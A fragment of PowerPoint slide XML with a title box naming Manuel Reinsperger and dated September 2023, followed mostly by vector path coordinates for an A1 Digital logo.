            <a:off x="7619532" y="5409220"/>
            <a:ext cx="4572468" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="r">
              <a:buFont typeface="A1 Sans" panose="00000500000000000000" pitchFamily="50" charset="0"/>
              <a:buChar char="‑"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manuel Reinsperger</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>September 2023 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78314CB-82F8-0E0E-5AAE-085178C659D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freihandform: Form 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19DCF97B-B804-D2E0-B086-3641BEFF04FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freihandform: Form 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE6535E-FD4F-7034-DADC-94AAA71E4334}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX43" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY43" fmla="*/ 693107 h 941357"/>
                <a:gd name="connsiteX44" fmla="*/ 3563206 w 4182422"/>
                <a:gd name="connsiteY44" fmla="*/ 749825 h 941357"/>
                <a:gd name="connsiteX45" fmla="*/ 3393942 w 4182422"/>
                <a:gd name="connsiteY45" fmla="*/ 603815 h 941357"/>
                <a:gd name="connsiteX46" fmla="*/ 3452529 w 4182422"/>
                <a:gd name="connsiteY46" fmla="*/ 483862 h 941357"/>
                <a:gd name="connsiteX47" fmla="*/ 3587372 w 4182422"/>
                <a:gd name="connsiteY47" fmla="*/ 457833 h 941357"/>
                <a:gd name="connsiteX48" fmla="*/ 3649691 w 4182422"/>
                <a:gd name="connsiteY48" fmla="*/ 459686 h 941357"/>
                <a:gd name="connsiteX49" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY49" fmla="*/ 462463 h 941357"/>
                <a:gd name="connsiteX50" fmla="*/ 3702694 w 4182422"/>
                <a:gd name="connsiteY50" fmla="*/ 442018 h 941357"/>
                <a:gd name="connsiteX51" fmla="*/ 3690611 w 4182422"/>
                <a:gd name="connsiteY51" fmla="*/ 388076 h 941357"/>
                <a:gd name="connsiteX52" fmla="*/ 3612503 w 4182422"/>
                <a:gd name="connsiteY52" fmla="*/ 366677 h 941357"/>
                <a:gd name="connsiteX53" fmla="*/ 3590190 w 4182422"/>
                <a:gd name="connsiteY53" fmla="*/ 367618 h 941357"/>
                <a:gd name="connsiteX54" fmla="*/ 3539954 w 4182422"/>
                <a:gd name="connsiteY54" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX55" fmla="*/ 3430216 w 4182422"/>
                <a:gd name="connsiteY55" fmla="*/ 420619 h 941357"/>
                <a:gd name="connsiteX56" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY56" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX57" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY57" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX58" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY58" fmla="*/ 331283 h 941357"/>
                <a:gd name="connsiteX59" fmla="*/ 2547213 w 4182422"/>
                <a:gd name="connsiteY59" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX60" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY60" fmla="*/ 282943 h 941357"/>
                <a:gd name="connsiteX61" fmla="*/ 2718330 w 4182422"/>
                <a:gd name="connsiteY61" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX62" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY62" fmla="*/ 384314 h 941357"/>
                <a:gd name="connsiteX63" fmla="*/ 2654158 w 4182422"/>
                <a:gd name="connsiteY63" fmla="*/ 692121 h 941357"/>
                <a:gd name="connsiteX64" fmla="*/ 2616030 w 4182422"/>
                <a:gd name="connsiteY64" fmla="*/ 866968 h 941357"/>
                <a:gd name="connsiteX65" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY65" fmla="*/ 941357 h 941357"/>
                <a:gd name="connsiteX66" fmla="*/ 2226352 w 4182422"/>
                <a:gd name="connsiteY66" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX67" fmla="*/ 2336114 w 4182422"/>
                <a:gd name="connsiteY67" fmla="*/ 789773 h 941357"/>
                <a:gd name="connsiteX68" fmla="*/ 2423513 w 4182422"/>
                <a:gd name="connsiteY68" fmla="*/ 844657 h 941357"/>
                <a:gd name="connsiteX69" fmla="*/ 2522107 w 4182422"/>
                <a:gd name="connsiteY69" fmla="*/ 797229 h 941357"/>
                <a:gd name="connsiteX70" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY70" fmla="*/ 705141 h 941357"/>
                <a:gd name="connsiteX71" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY71" fmla="*/ 688403 h 941357"/>
                <a:gd name="connsiteX72" fmla="*/ 2401201 w 4182422"/>
                <a:gd name="connsiteY72" fmla="*/ 737714 h 941357"/>
                <a:gd name="connsiteX73" fmla="*/ 2191955 w 4182422"/>
                <a:gd name="connsiteY73" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX74" fmla="*/ 2204978 w 4182422"/>
                <a:gd name="connsiteY74" fmla="*/ 416857 h 941357"/>
                <a:gd name="connsiteX75" fmla="*/ 2404018 w 4182422"/>
                <a:gd name="connsiteY75" fmla="*/ 269903 h 941357"/>
                <a:gd name="connsiteX76" fmla="*/ 338260 w 4182422"/>
                <a:gd name="connsiteY76" fmla="*/ 189573 h 941357"/>
                <a:gd name="connsiteX77" fmla="*/ 245317 w 4182422"/>
                <a:gd name="connsiteY77" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX78" fmla="*/ 431200 w 4182422"/>
                <a:gd name="connsiteY78" fmla="*/ 446957 h 941357"/>
                <a:gd name="connsiteX79" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY79" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX80" fmla="*/ 1408353 w 4182422"/>
                <a:gd name="connsiteY80" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX81" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY81" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX82" fmla="*/ 1715247 w 4182422"/>
                <a:gd name="connsiteY82" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX83" fmla="*/ 1469732 w 4182422"/>
                <a:gd name="connsiteY83" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX84" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY84" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX85" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY85" fmla="*/ 135153 h 941357"/>
                <a:gd name="connsiteX86" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY86" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX87" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY87" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX88" fmla="*/ 3343908 w 4182422"/>
                <a:gd name="connsiteY88" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX89" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY89" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX90" fmla="*/ 3234145 w 4182422"/>
                <a:gd name="connsiteY90" fmla="*/ 558285 h 941357"/>
                <a:gd name="connsiteX91" fmla="*/ 3285320 w 4182422"/>
                <a:gd name="connsiteY91" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX92" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY92" fmla="*/ 635479 h 941357"/>
                <a:gd name="connsiteX93" fmla="*/ 3344847 w 4182422"/>
                <a:gd name="connsiteY93" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX94" fmla="*/ 3284381 w 4182422"/>
                <a:gd name="connsiteY94" fmla="*/ 736848 h 941357"/>
                <a:gd name="connsiteX95" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY95" fmla="*/ 580595 h 941357"/>
                <a:gd name="connsiteX96" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY96" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX97" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY97" fmla="*/ 384390 h 941357"/>
                <a:gd name="connsiteX98" fmla="*/ 3049091 w 4182422"/>
                <a:gd name="connsiteY98" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX99" fmla="*/ 3116056 w 4182422"/>
                <a:gd name="connsiteY99" fmla="*/ 283019 h 941357"/>
                <a:gd name="connsiteX100" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY100" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX101" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY101" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX102" fmla="*/ 2954359 w 4182422"/>
                <a:gd name="connsiteY102" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX103" fmla="*/ 2833452 w 4182422"/>
                <a:gd name="connsiteY103" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX104" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY104" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX105" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY105" fmla="*/ 95151 h 941357"/>
                <a:gd name="connsiteX106" fmla="*/ 2087965 w 4182422"/>
                <a:gd name="connsiteY106" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX107" fmla="*/ 1967060 w 4182422"/>
                <a:gd name="connsiteY107" fmla="*/ 220706 h 941357"/>
                <a:gd name="connsiteX108" fmla="*/ 275065 w 4182422"/>
                <a:gd name="connsiteY108" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX109" fmla="*/ 401442 w 4182422"/>
                <a:gd name="connsiteY109" fmla="*/ 67826 h 941357"/>
                <a:gd name="connsiteX110" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY110" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX111" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY111" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX112" fmla="*/ 677400 w 4182422"/>
                <a:gd name="connsiteY112" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX113" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY113" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX114" fmla="*/ 437686 w 4182422"/>
                <a:gd name="connsiteY114" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX115" fmla="*/ 501792 w 4182422"/>
                <a:gd name="connsiteY115" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX116" fmla="*/ 468335 w 4182422"/>
                <a:gd name="connsiteY116" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX117" fmla="*/ 209085 w 4182422"/>
                <a:gd name="connsiteY117" fmla="*/ 545452 h 941357"/>
                <a:gd name="connsiteX118" fmla="*/ 175639 w 4182422"/>
                <a:gd name="connsiteY118" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX119" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY119" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX120" fmla="*/ 239765 w 4182422"/>
                <a:gd name="connsiteY120" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX121" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY121" fmla="*/ 736879 h 941357"/>
                <a:gd name="connsiteX122" fmla="*/ 0 w 4182422"/>
                <a:gd name="connsiteY122" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX123" fmla="*/ 52059 w 4182422"/>
                <a:gd name="connsiteY123" fmla="*/ 635588 h 941357"/>
                <a:gd name="connsiteX124" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY124" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX125" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY125" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX126" fmla="*/ 4119164 w 4182422"/>
                <a:gd name="connsiteY126" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX127" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY127" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX128" fmla="*/ 4182422 w 4182422"/>
                <a:gd name="connsiteY128" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX129" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY129" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX130" fmla="*/ 3930378 w 4182422"/>
                <a:gd name="connsiteY130" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX131" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY131" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX132" fmla="*/ 4001074 w 4182422"/>
                <a:gd name="connsiteY132" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX133" fmla="*/ 3936902 w 4182422"/>
                <a:gd name="connsiteY133" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX134" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY134" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX135" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY135" fmla="*/ 67265 h 941357"/>
                <a:gd name="connsiteX136" fmla="*/ 1736636 w 4182422"/>
                <a:gd name="connsiteY136" fmla="*/ 147236 h 941357"/>
                <a:gd name="connsiteX137" fmla="*/ 1839860 w 4182422"/>
                <a:gd name="connsiteY137" fmla="*/ 402075 h 941357"/>
                <a:gd name="connsiteX138" fmla="*/ 1831511 w 4182422"/>
                <a:gd name="connsiteY138" fmla="*/ 489482 h 941357"/>
                <a:gd name="connsiteX139" fmla="*/ 1686412 w 4182422"/>
                <a:gd name="connsiteY139" fmla="*/ 692212 h 941357"/>
                <a:gd name="connsiteX140" fmla="*/ 1475304 w 4182422"/>
                <a:gd name="connsiteY140" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX141" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY141" fmla="*/ 736863 h 941357"/>
                <a:gd name="connsiteX142" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY142" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX143" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY143" fmla="*/ 635494 h 941357"/>
                <a:gd name="connsiteX144" fmla="*/ 1285595 w 4182422"/>
                <a:gd name="connsiteY144" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX145" fmla="*/ 1221438 w 4182422"/>
                <a:gd name="connsiteY145" fmla="*/ 168636 h 941357"/>
                <a:gd name="connsiteX146" fmla="*/ 750838 w 4182422"/>
                <a:gd name="connsiteY146" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX147" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY147" fmla="*/ 0 h 941357"/>
                <a:gd name="connsiteX148" fmla="*/ 832594 w 4182422"/>
                <a:gd name="connsiteY148" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX149" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY149" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX150" fmla="*/ 935759 w 4182422"/>
                <a:gd name="connsiteY150" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX151" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY151" fmla="*/ 456258 h 941357"/>
                <a:gd name="connsiteX152" fmla="*/ 627228 w 4182422"/>
                <a:gd name="connsiteY152" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX153" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY153" fmla="*/ 368900 h 941357"/>
                <a:gd name="connsiteX154" fmla="*/ 730401 w 4182422"/>
                <a:gd name="connsiteY154" fmla="*/ 99437 h 941357"/>
                <a:gd name="connsiteX155" fmla="*/ 625402 w 4182422"/>
                <a:gd name="connsiteY155" fmla="*/ 140311 h 941357"/>
                <a:gd name="connsiteX156" fmla="*/ 597510 w 4182422"/>
                <a:gd name="connsiteY156" fmla="*/ 66914 h 94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182422" h="941357">
                  <a:moveTo>
                    <a:pt x="3600394" y="545242"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3534369" y="545242"/>
                    <a:pt x="3512056" y="559193"/>
                    <a:pt x="3512056" y="599184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3512056" y="607533"/>
                    <a:pt x="3513935" y="615910"/>
                    <a:pt x="3516701" y="622437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3525078" y="643806"/>
                    <a:pt x="3544625" y="651261"/>
                    <a:pt x="3588311" y="651261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3634816" y="651261"/>
                    <a:pt x="3666445" y="641940"/>
                    <a:pt x="3687819" y="623348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3701781" y="611250"/>
                    <a:pt x="3705512" y="601959"/>
                    <a:pt x="3705512" y="574988"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3705512" y="549872"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3675736" y="547095"/>
                    <a:pt x="3629231" y="545242"/>
                    <a:pt x="3600394" y="545242"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2419807" y="371294"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2405871" y="371294"/>
                    <a:pt x="2391910" y="374071"/>
                    <a:pt x="2380740" y="378729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2336114" y="397323"/>
                    <a:pt x="2311948" y="443828"/>
                    <a:pt x="2311948" y="507071"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2311948" y="525663"/>
                    <a:pt x="2314715" y="544255"/>
                    <a:pt x="2319386" y="560072"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2332383" y="606576"/>
                    <a:pt x="2371450" y="635403"/>
                    <a:pt x="2421660" y="635403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2490503" y="635403"/>
                    <a:pt x="2536069" y="585180"/>
                    <a:pt x="2536069" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2536069" y="425236"/>
                    <a:pt x="2490503" y="371294"/>
                    <a:pt x="2419807" y="371294"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2771158" y="283028"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="283028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2953445" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="635488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3016678" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="736857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2764635" y="635488"/>
                  </a:lnTo>
